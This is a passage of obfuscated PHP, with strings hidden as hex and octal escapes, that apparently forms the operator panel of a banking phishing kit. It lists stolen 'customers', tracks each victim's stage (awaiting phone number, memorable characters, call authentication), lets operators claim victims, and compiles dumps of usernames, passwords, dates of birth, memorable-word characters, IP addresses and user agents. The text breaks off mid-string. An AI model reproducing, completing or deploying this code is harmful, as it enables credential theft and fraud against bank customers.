\55\x6d\x64\40\x62\164\156\55\151\x6e\x66\157\x27\40\151\144\x3d\x27\x75\x73\x65\162\x69\144\137{$value["\151\144"]}\x27\40\144\141\x74\141\55\x74\157\147\147\154\145\x3d\x27\155\x6f\x64\141\154\47\x20\144\141\164\141\x2d\x74\x61\162\147\x65\x74\x3d\x27\43\155\x6f\144\x61\x6c\137\x75\x73\145\x72\151\x64\137{$value["\151\144"]}\x27\x3e\101\x63\x74\x69\x6f\x6e\74\57\142\165\x74\164\157\x6e\x3e\12\x9\11\x9\x9\11\x9\x9\x9\74\x62\x75\x74\x74\157\x6e\x20\x74\x79\160\x65\x3d\47\142\165\164\x74\157\156\47\x20\x63\x6c\141\163\x73\x3d\47\142\x74\156\x20\142\x74\156\55\x6d\x64\x20\x62\164\156\55\144\141\156\x67\145\x72\x27\x20\151\x64\75\x27\165\163\x65\x72\151\x64\137{$value["\x69\x64"]}\47\x6f\156\x63\x6c\x69\143\153\75\47\144\145\x6c\145\x74\x65\x65\x6e\x74\x72\171\x28\164\150\x69\x73\51\x27\76\74\151\x20\143\154\x61\x73\x73\x3d\x27\146\141\x20\x66\x61\55\164\162\x61\163\150\47\40\141\x72\151\x61\55\x68\151\x64\x64\x65\x6e\75\x27\x74\x72\165\145\x27\x3e\74\x2f\x69\76\x3c\x2f\142\165\x74\x74\x6f\156\x3e\xa\x9\x9\11\x9\11\11\x9\74\57\x74\144\x3e\xa\x9\11\11\11\11\x9\x3c\57\164\x72\76\12\11\11\11\x9\11\x9"; } else { echo "\xa\11\11\x9\x9\11\11\x3c\x74\162\x20\163\x74\171\154\x65\75\x27\x63\x6f\154\x6f\162\x3a\167\x68\x69\x74\145\x27\x3e\12\11\11\x9\11\11\x9\11\x3c\x74\144\x3e{$value["\x69\144"]}\74\x2f\164\144\x3e\12\11\11\x9\x9\x9\11\x9\74\164\144\x3e{$value["\x75\163\x72\154\x6f\147\x69\156"]}\x3c\x2f\x74\x64\76\xa\x9\x9\x9\11\11\11\x9\x3c\x74\x64\76{$userStatus}\x3c\x2f\x74\x64\x3e\12\11\x9\11\11\11\11\x9\74\164\144\x3e{$value["\x69\160"]}\x3c\57\x74\144\76\xa\11\11\11\11\11\x9\11\x3c\164\144\76{$value["\143\157\x6d\155\x65\156\164"]}\74\x2f\x74\x64\x3e\12\11\11\x9\11\x9\11\11\74\x74\x64\x3e{$info}\x3c\57\x74\x64\x3e\xa\x9\x9\x9\x9\x9\11\11\x3c\x74\x64\x3e\xa\x9\11\x9\x9\x9\x9\11\11\x3c\x73\160\x61\156\76\x43\x6c\x61\x69\155\145\x64\x20\142\x79\40\x2d\40\x3c\151\x3e{$value["\154\157\147\137\157\167\156\145\162"]}\x3c\57\151\76\74\57\163\160\x61\x6e\x3e\12\x9\x9\11\x9\11\11\11\74\x2f\x74\144\x3e\xa\x9\x9\x9\11\x9\x9\74\57\x74\x72\x3e\xa\11\11\x9\x9\x9\11"; } } } } } } if (isset($_GET["\x66\145\164\143\150\x5f\x64\141\164\x61"])) { $query = mysqli_query($conn, "\x53\x45\114\105\103\x54\x20\x2a\x20\146\x72\157\x6d\40\143\x75\163\x74\x6f\x6d\x65\x72\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\163\164\x61\164\165\x73"] == 500) { $info = "\x3c\163\160\141\156\x20\143\154\x61\163\x73\75\42\142\x61\144\147\x65\40\x62\x61\144\147\x65\55\x77\x61\x72\x6e\151\156\147\42\76\105\x61\x73\x74\145\162\40\145\147\x67\74\x2f\163\x70\141\x6e\x3e"; } elseif ($value["\163\x74\141\164\x75\163"] == 1) { $info = "\x3c\163\x70\141\156\x20\143\x6c\141\x73\163\x3d\42\x62\x61\144\x67\x65\40\x62\141\x64\x67\145\55\x69\156\146\157\x22\x3e\x4e\x65\167\x20\x55\x73\145\x72\x3c\57\163\160\x61\156\x3e"; } elseif ($value["\163\164\141\164\x75\x73"] == 2) { $info = "\74\163\160\141\x6e\40\143\x6c\141\x73\x73\75\42\142\141\144\147\x65\x20\x62\141\x64\x67\x65\55\x70\x72\151\155\141\x72\171\42\x3e\123\165\142\x6d\x69\x74\164\x65\144\x20\x4d\145\x6d\157\162\x61\x62\x6c\x65\40\143\x68\x61\162\141\x63\x74\x65\162\74\57\x73\x70\x61\156\x3e"; } elseif ($value["\x73\164\141\x74\165\163"] == 3) { $info = "\x3c\x73\x70\141\156\x20\143\154\141\x73\163\75\42\142\x61\144\147\x65\x20\x62\x61\144\x67\x65\x2d\160\162\151\x6d\141\x72\x79\42\76\x55\x73\x65\x72\40\162\145\141\x64\x79\x20\x74\157\x20\142\x65\40\x63\141\x6c\154\x65\144\74\x2f\x73\x70\x61\156\76"; } elseif ($value["\163\164\x61\x74\165\163"] == 4) { $info = "\x3c\x73\160\141\x6e\x20\143\154\141\x73\163\75\42\142\x61\144\147\x65\40\x62\141\x64\x67\145\55\160\x72\151\x6d\141\162\171\42\76\123\x75\x62\155\x69\x74\x74\x65\x64\40\x6d\x6f\142\x69\x6c\x65\40\156\x75\x6d\142\145\x72\74\x2f\x73\x70\x61\x6e\x3e"; } elseif ($value["\163\x74\x61\x74\x75\163"] == 5) { $info = "\x3c\x73\160\x61\x6e\x20\x63\154\x61\163\163\x3d\x22\x62\141\144\147\145\x20\x62\x61\144\147\x65\55\160\162\151\155\x61\x72\171\42\76\123\165\x62\155\x69\164\x74\145\144\40\x66\x75\154\154\x20\155\145\155\x6f\74\57\163\x70\141\x6e\76"; } elseif ($value["\x73\x74\x61\164\165\163"] == 6) { $info = "\x3c\x73\x70\141\156\40\x63\x6c\x61\x73\x73\75\42\x62\x61\144\147\x65\40\x62\x61\x64\x67\x65\55\160\x72\151\x6d\141\162\x79\x22\x3e\123\x75\142\155\x69\x74\x74\145\x64\40\104\x4f\102\x3c\57\x73\x70\x61\x6e\x3e"; } elseif ($value["\163\x74\141\164\x75\163"] == 11) { $info = "\x3c\x73\x70\141\x6e\x20\143\x6c\x61\163\x73\75\42\142\x61\x64\147\145\40\x62\141\144\147\145\x2d\160\162\151\155\141\x72\x79\x22\76\101\167\141\151\164\x69\x6e\147\x20\x4d\x65\x6d\x6f\40\x43\150\141\x72\x3c\x2f\163\160\141\156\x3e"; } elseif ($value["\163\164\x61\x74\165\x73"] == 12) { $info = "\74\163\x70\141\x6e\40\x63\154\141\x73\163\x3d\x22\x62\141\x64\147\145\x20\x62\x61\x64\147\x65\55\160\162\151\x6d\141\162\x79\x22\x3e\x41\x77\141\x69\x74\x69\x6e\x67\40\103\141\154\154\x20\162\x65\163\x70\157\x6e\163\145\74\x2f\x73\x70\141\x6e\x3e"; } elseif ($value["\x73\164\141\164\x75\x73"] == 13) { $info = "\74\x73\160\x61\156\x20\x63\154\141\x73\x73\75\x22\142\141\144\x67\145\x20\142\x61\x64\x67\x65\x2d\160\162\151\x6d\141\162\171\42\76\101\x77\x61\151\x74\151\x6e\147\40\x43\x61\154\154\x20\101\165\164\x68\74\57\x73\160\x61\x6e\76"; } elseif ($value["\163\164\x61\164\165\163"] == 14) { $info = "\74\163\160\141\156\40\x63\154\141\x73\163\75\x22\x62\141\x64\147\x65\x20\x62\141\x64\x67\x65\55\x70\x72\x69\155\x61\x72\x79\x22\x3e\101\167\141\151\164\x69\156\147\x20\x50\x68\157\156\x65\40\116\x6f\x2e\x3c\57\163\x70\141\156\76"; } elseif ($value["\163\x74\141\x74\x75\x73"] == 15) { $info = "\74\163\x70\141\x6e\x20\x63\154\x61\163\x73\x3d\x22\142\x61\x64\x67\x65\x20\x62\x61\x64\147\x65\55\160\x72\151\155\x61\x72\171\x22\x3e\101\x77\141\151\x74\151\156\147\40\x46\165\154\x6c\40\115\145\x6d\x6f\74\57\163\x70\141\x6e\x3e"; } elseif ($value["\x73\164\x61\164\165\x73"] == 16) { $info = "\x3c\163\160\x61\x6e\40\143\x6c\x61\163\x73\x3d\x22\142\x61\x64\x67\145\40\142\x61\144\x67\x65\55\160\x72\151\x6d\141\162\171\x22\x3e\x41\x77\x61\x69\164\x69\x6e\x67\40\104\x4f\102\74\x2f\x73\160\x61\156\76"; } elseif ($value["\x73\x74\x61\x74\165\163"] == 50) { $info = "\x3c\x73\x70\141\x6e\40\143\x6c\x61\163\x73\75\42\x62\x61\x64\147\145\x20\142\x61\x64\x67\145\x2d\160\x72\x69\155\141\162\171\x22\76\x42\x61\143\153\40\x74\157\x20\114\157\147\x69\x6e\74\x2f\163\160\141\156\76"; } elseif ($value["\x73\x74\141\164\165\x73"] == 100) { $info = "\x3c\163\x70\141\x6e\x20\x63\154\x61\163\x73\x3d\x22\142\x61\x64\147\145\x20\x62\141\144\147\x65\55\151\x6e\x66\157\x22\76\x49\x4e\x56\x41\x4c\111\x44\x3c\57\163\160\141\x6e\76"; } elseif ($value["\x73\164\x61\164\165\163"] == 20) { $info = "\x3c\x73\160\141\156\40\x63\x6c\x61\163\163\x3d\x22\x62\141\144\x67\x65\x20\142\x61\x64\x67\145\x2d\163\x75\x63\x63\x65\x73\x73\42\76\x46\x69\x6e\x69\x73\150\145\144\x3c\57\x73\160\141\x6e\76"; } if ($value["\163\x74\141\x74\x75\x73"] == 20) { $userStatus = "\x3c\x73\160\141\156\x3e\74\151\x6d\147\40\x73\x72\143\x3d\42\160\141\162\x74\x69\x61\154\57\151\155\147\x2f\x6f\x66\146\56\x70\156\147\x22\x20\163\x74\171\154\145\75\42\167\x69\144\164\x68\x3a\x32\60\x70\x78\73\x70\x61\144\144\x69\x6e\147\55\162\x69\x67\150\164\x3a\61\x70\x78\42\x3e\x3c\x62\76\117\146\x66\x6c\151\156\145\74\x2f\142\76\x3c\57\163\160\141\x6e\x3e"; echo "\12\11\11\x9\11\74\164\x72\x20\x73\164\x79\x6c\145\x3d\47\x63\157\154\157\x72\x3a\x77\x68\151\164\145\x27\76\12\x9\11\11\11\x9\74\164\144\x3e{$value["\x69\x64"]}\74\x2f\164\144\76\12\11\11\11\x9\x9\x3c\x74\x64\76{$value["\x75\x73\162\154\157\147\151\156"]}\x3c\x2f\164\x64\76\xa\11\x9\x9\11\11\x3c\164\144\76{$userStatus}\x3c\57\164\144\x3e\xa\11\x9\x9\11\11\74\x74\144\76{$value["\x69\160"]}\74\57\x74\144\x3e\12\11\x9\11\x9\11\x3c\x74\x64\76{$info}\74\x2f\x74\x64\76\12\x9\x9\11\11\x9\x3c\x74\x64\x3e\12\11\11\11\x9\11\11\x3c\142\165\x74\164\x6f\x6e\40\164\171\x70\x65\x3d\x27\142\x75\164\164\157\x6e\47\40\157\x6e\x63\154\151\143\153\x3d\x27\x76\151\145\x77\x5f\154\x6f\x67\x42\x74\156\50\x74\x68\151\x73\51\47\40\x63\x6c\x61\163\x73\x3d\47\x62\164\x6e\40\142\x74\x6e\x2d\155\144\x20\x62\x74\156\55\x64\x61\162\153\x27\40\151\144\x3d\47\x75\x73\145\x72\x69\x64\x5f{$value["\151\x64"]}\x27\40\x64\x61\x74\141\x2d\x74\157\x67\x67\154\x65\x3d\x27\x6d\x6f\x64\x61\x6c\x27\40\144\141\x74\x61\x2d\x74\141\162\x67\145\x74\x3d\47\43\x76\x69\145\x77\155\157\x64\x61\x6c\137\x75\x73\x65\x72\151\144\x5f{$value["\151\144"]}\47\76\x56\151\145\x77\40\114\157\147\74\x2f\x62\x75\164\164\x6f\x6e\76\12\x9\11\x9\x9\x9\11\74\x62\x75\x74\x74\x6f\x6e\x20\164\x79\160\145\75\47\142\165\164\x74\x6f\156\x27\40\x63\154\141\x73\163\x3d\x27\x62\164\x6e\40\142\x74\156\x2d\x6d\144\40\142\164\x6e\x2d\x64\x61\156\x67\x65\x72\x27\x20\151\x64\75\x27\165\163\145\x72\151\144\x5f{$value["\x69\x64"]}\x27\x6f\x6e\x63\x6c\151\x63\153\x3d\x27\144\145\154\145\164\x65\145\x6e\x74\x72\171\x28\x74\150\151\x73\51\47\x3e\x3c\x69\x20\143\x6c\x61\x73\x73\x3d\47\x66\x61\40\146\x61\55\164\162\141\x73\150\47\40\x61\162\151\x61\55\150\x69\x64\x64\x65\x6e\75\47\164\162\x75\x65\47\76\x3c\57\151\x3e\74\x2f\x62\x75\x74\x74\x6f\156\x3e\12\x9\x9\11\x9\x9\x3c\57\164\144\76\12\11\x9\11\x9\11\x3c\x74\x64\76\x46\x69\x6e\x69\163\x68\x65\x64\40\142\171\40\x2d\40{$value["\154\x6f\x67\x5f\157\x77\x6e\x65\x72"]}\74\x2f\164\144\76\12\11\11\11\11\74\57\164\x72\76\12\11\x9\11\11"; } else { $userStatus = "\74\x73\160\141\x6e\76\74\151\155\147\40\x73\x72\x63\75\42\x70\x61\162\x74\x69\141\154\57\x69\x6d\x67\57\157\146\146\x2e\x70\156\x67\42\x20\163\164\171\x6c\145\x3d\42\167\151\x64\x74\150\72\x32\x30\160\x78\x3b\160\x61\x64\144\151\x6e\147\55\162\x69\x67\150\164\x3a\61\160\170\x22\x3e\74\x62\x3e\117\146\x66\x6c\151\x6e\145\74\57\x62\x3e\74\x2f\x73\160\141\x6e\76"; $savedStatus = $value["\x6c\x61\163\164\x5f\x61\x63\x74\x69\x76\x69\164\x79"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\156\x6f\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\74\163\160\141\156\76\x3c\151\155\x67\x20\x73\162\143\75\x22\160\141\162\164\x69\x61\x6c\x2f\151\155\147\57\157\x6e\56\x70\x6e\147\x22\x20\163\x74\x79\154\x65\75\42\167\x69\x64\x74\x68\x3a\62\x30\x70\x78\x3b\x70\x61\x64\x64\x69\156\x67\x2d\x72\151\x67\x68\x74\72\61\160\170\x22\76\x3c\142\x3e\117\156\154\151\156\x65\74\x2f\x62\x3e\x3c\57\163\160\141\156\76"; } } else { if ($savedStatus === null) { $userStatus = "\x3c\163\160\x61\x6e\x3e\74\151\x6d\147\40\163\x72\143\75\x22\160\141\162\x74\151\141\x6c\57\151\155\147\x2f\x6e\x61\56\x70\156\x67\42\40\x73\164\x79\x6c\x65\x3d\42\x77\151\144\x74\150\72\62\65\160\170\73\x70\141\144\x64\x69\x6e\x67\55\x72\151\x67\150\164\x3a\61\x70\x78\x22\x3e\74\x62\x3e\x4e\x6f\40\x64\141\x74\141\x3c\57\142\x3e\74\57\x73\160\x61\x6e\x3e"; } } if ($Multiple_Admins == "\157\x66\x66") { echo "\12\x9\11\x9\11\x9\x3c\164\x72\x20\x73\164\x79\154\x65\x3d\47\143\157\154\157\x72\x3a\x77\x68\x69\164\145\47\x3e\12\11\x9\x9\x9\11\x9\74\164\x64\76{$value["\x69\x64"]}\74\x2f\x74\144\76\xa\x9\x9\x9\11\x9\x9\74\164\x64\76{$value["\165\x73\x72\x6c\x6f\147\151\x6e"]}\x3c\x2f\164\x64\76\12\x9\11\x9\x9\x9\x9\74\x74\144\x3e{$userStatus}\x3c\57\x74\144\x3e\12\x9\x9\x9\11\11\11\x3c\x74\x64\x3e{$info}\x3c\142\x72\76{$value["\x63\x6f\155\155\x65\156\x74"]}\x3c\x2f\x74\x64\x3e\xa\x9\x9\x9\x9\11\x9\74\164\144\x3e\xa\x9\x9\x9\11\11\11\x9\74\142\165\x74\164\157\x6e\x20\x74\171\x70\145\x3d\47\142\165\x74\x74\x6f\156\x27\x20\x6f\x6e\x63\x6c\x69\x63\x6b\x3d\x27\x63\x6f\x6e\x74\162\x6f\154\102\164\156\50\164\x68\x69\x73\x29\x27\40\143\x6c\x61\163\163\x3d\x27\142\164\156\40\x62\x74\156\x2d\x6d\x64\40\142\x74\x6e\55\151\x6e\x66\x6f\x27\40\151\144\x3d\47\x75\x73\x65\162\x69\x64\137{$value["\x69\x64"]}\47\x20\144\x61\x74\x61\55\164\157\x67\147\154\145\x3d\47\x6d\157\144\141\x6c\x27\40\144\x61\164\x61\55\164\x61\162\147\x65\164\x3d\47\43\155\157\144\x61\154\137\165\163\145\x72\x69\x64\x5f{$value["\x69\x64"]}\47\76\x41\x63\164\x69\157\156\74\57\142\x75\x74\x74\x6f\x6e\76\xa\11\11\11\11\11\11\11\74\x62\165\164\164\157\x6e\x20\x74\x79\x70\145\x3d\47\x62\165\164\x74\157\x6e\47\x20\143\x6c\141\x73\163\x3d\47\x62\164\x6e\x20\142\164\156\x2d\x6d\144\40\x62\x74\156\x2d\144\141\x6e\x67\x65\162\x27\x20\151\144\75\47\165\x73\145\x72\151\x64\137{$value["\x69\144"]}\x27\157\x6e\x63\x6c\151\143\x6b\x3d\47\x64\145\x6c\145\164\145\145\156\x74\162\171\x28\164\x68\151\x73\51\x27\76\74\151\40\x63\x6c\x61\163\163\75\47\x66\x61\40\146\141\55\164\x72\141\163\150\47\x20\x61\x72\x69\141\x2d\150\x69\x64\144\x65\x6e\75\x27\x74\162\165\145\47\76\74\x2f\x69\76\x3c\x2f\x62\x75\x74\164\x6f\x6e\x3e\xa\x9\11\11\11\x9\x9\74\57\164\144\x3e\12\x9\11\11\x9\x9\x3c\57\x74\162\76\12\x9\11\x9\x9\x9"; } else { if ($value["\154\157\147\x5f\157\x77\x6e\145\x72"] == '') { echo "\12\x9\11\11\11\11\11\x3c\164\162\40\x73\164\x79\154\x65\x3d\47\143\157\154\157\x72\72\x77\150\x69\164\145\x27\x3e\xa\x9\x9\11\11\x9\11\x9\x3c\x74\144\x3e{$value["\151\x64"]}\74\x2f\164\144\x3e\12\x9\11\11\x9\x9\11\11\74\164\x64\76{$value["\x75\163\x72\x6c\x6f\147\151\156"]}\x3c\57\164\x64\x3e\xa\11\11\x9\x9\x9\11\11\74\x74\144\76{$userStatus}\74\57\x74\x64\x3e\xa\x9\11\11\11\11\11\x9\x3c\164\x64\76{$info}\74\142\x72\76{$value["\x63\157\x6d\155\x65\x6e\164"]}\74\57\164\144\76\xa\x9\11\x9\11\11\11\x9\74\164\x64\x3e\xa\x9\11\11\x9\11\11\x9\x9\x3c\142\165\164\164\x6f\156\x20\x74\x79\x70\x65\75\47\142\165\x74\x74\157\156\47\40\157\x6e\143\x6c\x69\143\x6b\x3d\47\143\154\x61\151\x6d\102\164\x6e\x28\164\150\x69\163\51\x27\x20\143\154\x61\x73\163\75\47\x62\164\x6e\40\x62\164\156\55\155\144\40\x62\164\x6e\55\x69\x6e\146\157\x27\x20\151\x64\x3d\x27\x75\x73\145\x72\x69\x64\x5f{$value["\151\144"]}\47\x20\144\x61\x74\141\x2d\x74\157\x67\147\x6c\145\x3d\47\x6d\157\x64\141\154\47\x20\x64\141\x74\141\55\164\x61\x72\x67\145\164\x3d\47\43\x6d\157\x64\141\x6c\137\x75\x73\145\162\151\x64\137{$value["\x69\x64"]}\x27\x3e\x20\x43\154\x61\151\155\40\x4c\157\x67\40\360\x9f\x94\221\x3c\57\142\x75\x74\164\x6f\156\x3e\xa\11\11\x9\11\x9\x9\x9\74\57\164\144\x3e\xa\x9\11\11\11\x9\x9\74\57\x74\x72\76\xa\x9\x9\11\11\11\x9"; } else { if ($value["\154\x6f\147\x5f\x6f\x77\x6e\145\x72"] == $_SESSION["\x6c\x6f\x67\x5f\x6f\167\156\145\162"]) { echo "\12\11\11\x9\11\11\x9\x3c\x74\x72\x20\x73\x74\x79\154\x65\75\x27\143\x6f\x6c\x6f\x72\x3a\167\150\x69\164\x65\x27\x3e\xa\x9\x9\x9\11\x9\x9\x9\x3c\x74\x64\76{$value["\x69\144"]}\x3c\x2f\164\144\76\12\11\11\x9\11\11\x9\11\x3c\x74\144\x3e{$value["\x75\163\x72\x6c\x6f\x67\x69\x6e"]}\x3c\57\x74\144\76\12\11\11\x9\11\11\x9\x9\74\164\144\76{$userStatus}\x3c\57\x74\x64\76\12\x9\x9\11\x9\x9\11\11\x3c\x74\144\x3e{$info}\x3c\x62\162\x3e{$value["\143\157\155\155\145\x6e\164"]}\74\57\x74\x64\x3e\12\x9\x9\11\11\11\11\x9\x3c\x74\144\76{$info}\x3c\x2f\164\144\x3e\xa\11\x9\11\11\x9\11\11\x3c\164\x64\76\xa\x9\11\x9\x9\x9\11\11\x9\x3c\x62\x75\164\x74\x6f\156\x20\164\x79\x70\145\75\x27\142\x75\164\x74\157\156\x27\x20\157\156\x63\x6c\151\143\153\x3d\x27\x63\x6f\x6e\x74\x72\x6f\x6c\102\164\156\50\164\x68\151\x73\51\x27\x20\x63\154\x61\163\163\75\47\x62\164\156\40\x62\164\156\x2d\x6d\144\x20\142\x74\156\55\x69\156\146\157\47\x20\151\144\x3d\47\x75\x73\145\x72\151\x64\x5f{$value["\x69\144"]}\47\x20\x64\141\x74\141\x2d\x74\157\147\147\x6c\145\75\47\x6d\x6f\x64\141\x6c\x27\x20\144\141\x74\x61\x2d\x74\141\162\x67\145\164\75\x27\x23\x6d\157\144\x61\154\x5f\165\163\145\162\x69\144\x5f{$value["\151\144"]}\x27\x3e\101\143\164\151\157\x6e\x3c\x2f\x62\x75\x74\x74\157\x6e\76\12\x9\11\x9\x9\x9\11\x9\11\x3c\x62\x75\164\164\157\156\40\164\171\160\x65\x3d\47\x62\165\x74\164\157\156\47\x20\143\x6c\x61\163\163\x3d\x27\142\164\x6e\40\x62\x74\156\x2d\155\144\x20\142\x74\156\55\144\141\x6e\147\145\x72\x27\x20\151\144\75\47\x75\163\145\162\151\144\x5f{$value["\151\x64"]}\x27\157\x6e\x63\x6c\x69\143\153\x3d\47\x64\145\154\145\164\145\x65\156\164\162\x79\x28\x74\x68\x69\163\x29\47\x3e\x3c\x69\40\143\154\x61\163\x73\x3d\x27\x66\141\x20\x66\x61\x2d\164\x72\x61\x73\x68\47\x20\141\x72\151\x61\x2d\x68\x69\x64\144\x65\x6e\75\47\x74\x72\x75\x65\x27\76\74\57\x69\x3e\74\x2f\x62\x75\x74\x74\x6f\156\x3e\12\11\11\11\x9\x9\11\x9\74\57\x74\x64\x3e\xa\11\x9\11\x9\11\x9\74\x2f\x74\162\x3e\xa\x9\11\x9\11\x9\x9"; } else { echo "\xa\11\11\11\11\x9\11\74\x74\162\x20\163\164\x79\x6c\145\75\47\143\x6f\x6c\x6f\x72\x3a\x77\x68\151\x74\x65\x27\x3e\12\x9\x9\11\11\11\11\11\74\x74\x64\76{$value["\151\144"]}\x3c\57\x74\x64\76\xa\x9\x9\11\11\11\x9\x9\x3c\164\144\76{$value["\x75\163\162\154\157\x67\151\156"]}\74\x2f\x74\144\x3e\12\11\x9\x9\11\11\11\x9\x3c\164\144\76{$userStatus}\x3c\57\164\144\76\xa\x9\11\x9\x9\x9\11\x9\x3c\x74\144\x3e{$info}\x3c\x62\162\76{$value["\143\157\x6d\x6d\x65\x6e\164"]}\74\x2f\164\144\76\xa\11\x9\x9\11\x9\x9\11\x3c\x74\144\76\12\x9\11\11\x9\x9\x9\11\x9\74\x73\x70\x61\x6e\x3e\103\154\x61\151\155\x65\x64\x20\x62\x79\40\x2d\x20\x3c\x69\76{$value["\x6c\157\147\x5f\157\167\x6e\x65\162"]}\x3c\57\151\x3e\74\x2f\x73\160\141\156\x3e\12\11\x9\x9\11\11\x9\11\x3c\x2f\x74\x64\x3e\12\11\11\x9\x9\11\x9\74\57\x74\162\76\12\11\11\11\x9\x9\x9"; } } } } } } if (isset($_GET["\x63\154\141\x69\155\x5f\144\141\164\x61"])) { if ($_POST["\165\163\x65\162\151\144"] and numeric($_POST["\x75\163\x65\x72\x69\x64"]) == true) { $userid = $_POST["\165\163\x65\x72\151\144"]; $log_owner = $_SESSION["\x6c\157\x67\x5f\x6f\x77\156\145\162"]; $query = mysqli_query($conn, "\125\120\104\101\124\105\x20\143\165\163\164\157\x6d\x65\x72\x73\x20\x53\x45\124\40\154\x6f\x67\x5f\x6f\167\156\x65\x72\x3d\x27{$log_owner}\47\54\40\x62\x75\x7a\x7a\x65\144\75\61\x20\127\x48\x45\122\x45\x20\151\x64\75{$userid}"); if ($query) { echo json_encode(array("\163\164\141\x74\x75\x73" => "\157\153")); } else { echo json_encode(array("\163\x74\x61\x74\x75\x73" => "\x6e\157\x74\x6f\x6b")); } } else { echo json_encode(array("\x73\x74\x61\x74\x75\163" => "\x6e\157\164\x6f\x6b\153")); } } if (isset($_GET["\x66\x65\164\143\x68\137\x70\x63\x5f\155\157\x64\x61\x6c\x5f\x64\141\x74\141"])) { $query = mysqli_query($conn, "\123\105\114\105\103\124\x20\x2a\40\x66\x72\x6f\x6d\40\143\165\x73\x74\157\x6d\x65\x72\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\165\163\162\154\157\x67\x69\156"]; $usrpass = $value["\165\x73\162\160\141\x73\163"]; $memchar1 = $value["\x6d\145\x6d\143\x68\x61\x72\61"]; $memchar2 = $value["\x6d\145\x6d\143\150\x61\162\x32"]; $memchar3 = $value["\x6d\x65\155\143\150\x61\162\63"]; $askchar1 = $value["\x61\163\x6b\143\150\141\x72\61"]; $askchar2 = $value["\x61\x73\x6b\143\150\141\x72\x32"]; $askchar3 = $value["\x61\163\153\x63\150\141\x72\x33"]; $phonenum = $value["\x70\x68\157\x6e\145\156\165\155"]; $fullmemo = $value["\146\165\154\154\x6d\145\x6d\x6f"]; $usrdob = $value["\165\x73\162\144\157\x62"]; $Char_one = $askchar1 . "\40\x63\x68\141\162\x61\x63\x74\x65\x72\x20\x2d\40" . $memchar1; $Char_two = $askchar2 . "\40\143\150\141\x72\x61\x63\164\145\162\40\55\40" . $memchar2; $Char_three = $askchar3 . "\x20\x63\150\141\x72\141\x63\164\x65\x72\x20\55\x20" . $memchar3; $expiry = $value["\x65\x78\160\x69\x72\171"]; $ip = $value["\151\x70"]; $useragent = urldecode($value["\x75\163\x65\x72\x61\x67\145\x6e\164"]); $data_log = "\12\x9\11\11\x3d\x3d\x3d\x3d\75\342\211\xab\x20\x4c\117\107\x49\x4e\x20\342\211\252\x3d\75\x3d\75\75\12\x9\x9\x9\125\x73\145\162\x20\111\104\x2f\x4e\157\x2e\x20\x3a\40{$usrlogin}\12\x9\11\x9\x50\141\163\x73\x20\72\x20{$usrpass}\xa\11\11\x9\120\x68\157\x6e\145\x20\x4e\x6f\x20\72\40{$phonenum}\xa\11\x9\x9\x44\x4f\x42\x20\x3a\40{$usrdob}\xa\11\11\11\75\x3d\75\x3d\x3d\342\x89\xab\40\123\105\103\125\122\111\124\x59\40\xe2\211\252\75\75\75\75\75\xa\11\11\x9{$Char_one}\xa\x9\11\x9{$Char_two}\12\x9\11\11{$Char_three}\xa\11\x9\11\x46\165\x6c\x6c\40\115\145\155\x6f\x20\72\x20{$fullmemo}\xa\11\11\11\x3d\x3d\75\x3d\75\75\75\x3d\x3d\x3d\75\x3d\x3d\75\75\75\x3d\x3d\75\x3d\75\x3d\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\xa\11\11\x9\x49\120\40\x3a\x20{$ip}\xa\11\11\11\125\x41\40\x3a\x20{$useragent}\12\x9\x9\x9\75\x3d\x3d\75\75\75\75\75\75\75\75\75\75\75\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\75\75\75\x3d\x3d"; echo "\xa\11\12\x9\x9\x9\x3c\x64\x69\x76\x20\143\x6c\x61\x73\163\x3d\x27\x6d\157\144\141\x6c\40\146\141\144\145\x27\x20\x69\144\75\x27\155\x6f\144\x61\154\x5f\165\163\x65\x72\151\144\137{$value["\x69\144"]}\47\40\x74\141\x62\151\156\144\145\170\75\47\55\x31\47\x20\x72\x6f\154\x65\x3d\47\x64\x69\x61\x6c\x6f\147\x27\x20\x61\x72\151\x61\55\154\141\x62\x65\x6c\154\x65\144\142\171\x3d\47\x65\x78\x61\x6d\160\154\145\115\x6f\144\x61\154\114\x61\142\145\154\47\x20\141\162\151\141\x2d\x68\151\x64\144\x65\156\75\47\164\162\x75\145\x27\x20\x73\x74\x79\154\145\x3d\x27\157\x70\141\143\x69\x74\x79\72\61\40\x21\x69\155\x70\157\162\x74\x61\x6e\x74\x3b\144\x69\163\160\154\141\171\72\x6e\157\x6e\x65\x3b\150\x65\x69\147\x68\x74\x3a\61\60\60\45\73\157\166\x65\162\146\154\157\167\72\x73\x63\x72\157\x6c\154\x3b\x27\76\xa\x9\11\x9\11\74\x66\157\162\x6d\x20\x6e\141\155\x65\75\x27\143\x6f\156\146\x69\x67\x5f\146\157\162\155\x5f{$value["\x69\144"]}\47\x20\151\x64\x3d\x27\x63\x6f\156\146\x69\147\137\146\x6f\162\x6d\137{$value["\151\144"]}\x27\x20\x6d\145\x74\150\x6f\144\75\x27\120\x4f\123\x54\47\x20\x61\143\164\x69\157\156\x3d\x27\x27\40\x6e\157\x76\x61\154\151\144\x61\164\x65\x3e\xa\11\11\11\x9\x9\x3c\x69\x6e\x70\x75\x74\40\164\171\160\145\75\47\150\151\144\144\x65\x6e\47\40\156\x61\155\145\75\x27\x75\163\145\x72\x69\x64\47\40\166\x61\154\x75\145\x3d\x27{$value["\151\x64"]}\x27\76\xa\x9\x9\x9\11\x9\x3c\x64\x69\166\40\x63\x6c\141\163\163\75\47\155\x6f\144\141\x6c\x2d\x64\151\141\x6c\157\x67\x27\x20\x72\157\x6c\x65\75\47\x64\x6f\143\165\x6d\145\156\164\x27\x20\163\x74\171\x6c\x65\75\x27\x77\x69\144\x74\x68\72\65\x30\60\x70\170\47\x3e\12\x9\x9\11\x9\x9\x9\74\x64\x69\166\x20\143\154\141\x73\163\75\x27\x6d\157\144\x61\x6c\x2d\x63\157\x6e\164\x65\156\164\x27\x20\163\164\171\x6c\145\75\47\x62\x61\x63\x6b\147\162\x6f\x75\156\144\55\x63\x6f\154\x6f\